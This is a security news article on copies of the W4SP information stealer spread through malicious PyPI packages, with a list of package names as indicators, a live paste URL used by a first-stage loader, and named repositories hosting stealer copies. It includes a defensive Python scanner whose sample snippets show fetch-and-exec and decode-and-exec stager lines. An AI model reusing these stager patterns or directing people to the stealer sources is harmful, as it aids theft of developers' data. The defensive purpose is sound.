Researchers from Phylum recently discovered that information-stealing malware was being delivered to Python developers' machines through malicious packages in order to steal their data.
The malware has appeared under many different names, but its source code shows that it is a simple copy of W4SP, the original stealer.
Attack Chain to Deploy Malware
In most of these cases the stealer was dropped directly into main.py, with no attempt to hide the code or otherwise evade detection.
One case was identified in which multiple stages were used to obscure and obfuscate the attacker's intent: the package chazz pulls obfuscated code from the website klgrth.io, and chazz itself is only a single stage that performs that pull.
The first-stage code is very similar to the stealer and injector code and has been obfuscated with BlankOBF, another obfuscation tool. Once de-obfuscated, it reveals the Leaf $tealer.
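A defender-side check for the two behaviours just described, added here as an example and not part of Phylum's research or tooling: a static scan of a package's Python source that flags exec/eval of content fetched over the network (the chazz stager pattern) or of a base64/zlib/marshal-decoded blob (the BlankOBF pattern). The sample snippets, package names and URL are constructed for illustration.

```python
import ast
# Call targets (exact or dotted-suffix match) for the two behaviours described
# above: a stager fetching its payload, and exec of a decoded (BlankOBF-style) blob.
NETWORK_CALLS = ("requests.get", "requests.post", "urlopen", "urlretrieve")
DECODE_CALLS = ("b64decode", "zlib.decompress", "marshal.loads", "lzma.decompress")

def _dotted(func):
    """Render a call target as a dotted name ('requests.get'); '' if dynamic."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""

def _calls_in(node):
    """Dotted names of every call made anywhere inside the subtree."""
    return {_dotted(n.func) for n in ast.walk(node) if isinstance(n, ast.Call)}

def _matches(calls, known):
    """True if any call equals a known target or ends with '.<target>'."""
    return any(c == k or c.endswith("." + k) for c in calls for k in known)

def scan_source(src, filename="<module>"):
    """Return sorted (lineno, reason) findings for exec/eval of remote or decoded code."""
    tree = ast.parse(src, filename)
    tainted = set()  # variables assigned from a network fetch
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and _matches(_calls_in(node.value), NETWORK_CALLS):
            tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _dotted(node.func) in ("exec", "eval"):
            calls = _calls_in(node)
            used = {n.id for n in ast.walk(node) if isinstance(n, ast.Name)}
            if _matches(calls, NETWORK_CALLS) or used & tainted:
                findings.append((node.lineno, "exec/eval of remotely fetched content"))
            elif _matches(calls, DECODE_CALLS):
                findings.append((node.lineno, "exec/eval of decoded/obfuscated blob"))
    return sorted(findings)

# Constructed samples (not real package code) showing each pattern.
STAGER_SAMPLE = ('import requests\n'
                 'code = requests.get("https://paste.example/raw/PLACEHOLDER").text\n'
                 'exec(code)\n')
OBFUSCATED_SAMPLE = ('import base64, zlib\n'
                     'exec(compile(zlib.decompress(base64.b64decode(b"eJwr")), "<s>", "exec"))\n')
```

Run `scan_source()` over every .py file in an unpacked sdist or wheel before installing; an empty result is not proof of safety, only the absence of these two specific patterns.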
Malicious Packages
Below is the list of malicious packages (IOCs) identified so far. We can expect this list to keep growing over time.
- modulesecurity – "Celestial Stealer"
- informmodule – "Leaf $tealer"
- chazz – first stage that pulls from https://www.klgrth.io/paste/j2yvv/raw, which contains the obfuscated code described above
- randomtime – "ANGEL stealer"
- proxygeneratorbil – "@skidSTEALER"
- easycordey – "@skid Stealer"
- easycordeyy – "@skid Stealer"
- tomproxies – "@skid STEALER"
- sys-ej – "Hyperion Obfuscated Code"
- infosys – "@734 Stealer"
- sysuptoer – "BulkFA Stealer"
- nowsys – "ANGEL Stealer"
- upamonkws – "PURE Stealer"
- captchaboy – "@skid STEALER"
- proxybooster – "Fade Stealer"
W4SP Copy
The original W4SP publication in loTus's repository was taken down by GitHub staff for violating GitHub's terms of service, so it can no longer be found there.
Phylum has for some time made it its mission to monitor these threat actors and to try to take down their infrastructure, given its pervasive and egregious nature.
After the W4SP Stealer repository was deleted, multiple copies of W4SP Stealer began appearing under different names. Threat actors are even distributing this new stealer through PyPI, which indicates that it is becoming a serious threat.
Copies of W4SP were found in two GitHub repositories, under two different aliases, each with its own purpose:
- Satan Stealer
- angel-stealer
A copy of the original source, along with earlier versions of W4SP, is hosted on an account named aceeontop.
W4SP Stealer and its imitations will continue to plague the community for a long time.
As time goes by, these criminals will grow in number, persistence and sophistication. Phylum, however, was able to block these supply chain attacks because its platform has the capability to detect and prevent them.